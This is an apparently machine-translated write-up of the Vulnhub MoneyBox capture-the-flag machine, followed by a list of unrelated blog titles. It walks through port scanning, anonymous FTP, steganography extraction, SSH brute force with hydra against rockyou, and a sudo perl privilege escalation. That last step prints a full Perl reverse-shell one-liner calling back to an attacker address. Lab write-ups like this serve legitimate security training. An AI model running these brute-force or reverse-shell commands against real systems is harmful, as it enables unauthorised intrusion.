当前位置:网站首页>Vulnhub-Moneybox
Vulnhub-Moneybox
2022-07-05 15:37:00 【GALi_ two hundred and thirty-three】
Description
The target plane comes from vulnhub MONEYBOX 1 . Present in the target 3 individual flag, The goal this time is to get this 3 individual flag, Don't talk too much. Let's start .
Scanning and service identification
Target and Kali In the same network segment , Through two-layer scanning (arp-scan) Survival of the same network segment IP
sudo arp-scan -I eth0 -l # -I network card -l Local network
By judgment ,192.168.54.250 For the target address .
Scan the open port of the target
sudo nmap -p- 192.168.54.250
Find out 21,22,80 port , Service identification of these ports
sudo nmap -p21,22,80 -sV 192.168.54.250
Found that the goal is open ftp service ,ssh as well as web service
Vulnerability scanning
Use nmap Use the default script to scan for service vulnerabilities
sudo nmap -p21 -sC 192.168.54.250 # -sC Default script
The scan found ftp Anonymous login vulnerability exists
ssh and http The service found nothing unusual
Sorting and analysis
Anonymous user login
First use the anonymous login vulnerability found
Use the account and password anonymous/anonymous Landing successful , And found a picture trytofind.jpg
Download the picture locally ( Pictures may contain some information )
visit web service
View source discovery , No information was found
Catalog explosion
Website directory (dirsearch Need to install )
dirsearch -u http://192.168.54.250/
Found a blog page
According to the content of the page , Tips found in the page source code , There is a secret directory S3cr3t-T3xt
Access directory
A key is found in the source code of the page 3xtr4ctd4t4
Picture steganography
adopt strings Command to check whether there is any obvious character information in the picture
strings trytofind.jpg
Although I didn't see the obvious information directly , But see abnormal characters , What is inserted in the guest picture
use steghide Look at the inserted data
steghide info trytofind.jpg
Find out you need a password , Use the previously obtained key 3xtr4ctd4t4 Try
success , Found that there was a data.txt file
Extract information
steghide extract -sf trytofind.jpg
ssh Blast
see data file
Find several keyword eyes , The person's name renu, The password is weak , Can be judged renu It may be an account with weak password , It can be brutally cracked
First, find a dictionary (/usr/share/wordlists/rockyou.txt.gz)
cp /usr/share/wordlists/rockyou.txt.gz .
gunzip rockyou.txt.gz
You can use it here nmap Of ssh Blasting script , It can also be used. hydra
nmap --script ssh-brute --script-args userdb=user.txt,passdb=rockyou.txt 192.168.54.250
Use hydra
hydra -l renu -P rockyou.txt 192.168.54.250 ssh
Crack success
The account password is renu/987654321
obtain Flag
ssh Connect to renu account number
View directory
Successfully get the first Flag
Try sudo To root user
Because it is not in the super user group , Not enough permissions
View history command history
history
Find a lily user , And have passed ssh Traces of landing
Get into home In the directory lily User files , Find the second Flag
Get into lily Under the .ssh The folder and renu Of .ssh Folder
Find out lily Of authorized_keys There is renu The public key , therefore renu You can go directly through ssh Log in to lily account number .
see lily User's permission information
Find out lily Users can use... Without using a password Perl Program
stay kali On the monitor 3334 port
nc -nvlp 3334
utilize perl Program running rebound shell
sudo perl -e 'use Socket;$i="192.168.54.103";$p=3334;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Successful connection , get root jurisdiction
Get into root root directory
Find out .root.txt file , Get the last Flag
边栏推荐
- P1451 calculate the number of cells / 1329: [example 8.2] cells
- Basic JSON operations of MySQL 5.7
- Creation and optimization of MySQL index
- 数学建模之层次分析法(含MATLAB代码)
- keep-alive
- qt creater断点调试程序详解
- RepLKNet:不是大卷积不好,而是卷积不够大,31x31卷积了解一下 | CVPR 2022
- P6183 [USACO10MAR] The Rock Game S
- 市值蒸发超百亿美元,“全球IoT云平台第一股”赴港求生
- Appium automation test foundation - appium basic operation API (I)
猜你喜欢
Usage and usage instructions of JDBC connection pool
Ten billion massage machine blue ocean, difficult to be a giant
Bugku's steganography
Ctfshow web entry command execution
Summary of the second lesson
Xiao Sha's arithmetic problem solving Report
Bugku cyberpunk
基于OpenHarmony的智能金属探测器
keep-alive
六种常用事务解决方案,你方唱罢,我登场(没有最好只有更好)
随机推荐
Reproduce ThinkPHP 2 X Arbitrary Code Execution Vulnerability
数据库学习——数据库安全性
Bugku cyberpunk
ICML 2022 | 探索语言模型的最佳架构和训练方法
episodic和batch的定义
Ionic Cordova project modification plug-in
Common MySQL interview questions (1) (written MySQL interview questions)
mapper. Comments in XML files
Transfer the idea of "Zhongtai" to the code
Virtual base class (a little difficult)
Interval DP (gravel consolidation)
Explanation report of the explosion
Common interview questions about swoole
Database learning - Database Security
sql server char nchar varchar和nvarchar的区别
JS topic - console log()
Au - delà du PARM! La maîtrise de l'Université de Pékin propose diverse pour actualiser complètement le classement du raisonnement du NLP
Cartoon: programmers don't repair computers!
30岁汇源,要换新主人了
复现Thinkphp 2.x 任意代码执行漏洞